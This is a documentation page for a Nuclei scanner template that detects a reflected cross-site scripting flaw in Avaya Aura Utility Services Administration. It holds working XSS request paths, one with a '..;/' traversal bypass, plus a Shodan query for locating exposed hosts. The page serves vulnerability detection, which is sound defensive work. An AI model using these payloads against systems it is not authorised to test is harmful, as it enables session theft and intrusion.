Avaya Aura Utility Services Administration - Cross-Site Scripting
ID: avaya-aura-xss
Severity: medium
Author: DhiyaneshDk
Tags: xss,avaya,aura,iot
Description
Section titled “Description”Avaya Aura Utility Services Administration contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: avaya-aura-xss
info: name: Avaya Aura Utility Services Administration - Cross-Site Scripting author: DhiyaneshDk severity: medium description: Avaya Aura Utility Services Administration contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/ - https://download.avaya.com/css/public/documents/101076366 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 cpe: cpe:2.3:a:avaya:aura_utility_services:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"Avaya Aura" product: aura_utility_services vendor: avaya tags: xss,avaya,aura,iot
http: - method: GET path: - "{{BaseURL}}/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e" - "{{BaseURL}}/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
stop-at-first-match: true
matchers-condition: and matchers: - type: word words: - '<script>alert(document.domain)</script>' - 'Avaya Aura Device Services' condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a0047304502206046a70893f9ecd6e02474036df1ce5331725c670223dd991cf99ecd808551f5022100ff5955730ca22cfafbb4c491db7f5b74d40f3677a37aaa93b1dd7c9fab5cf160:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/avaya/avaya-aura-xss.yaml"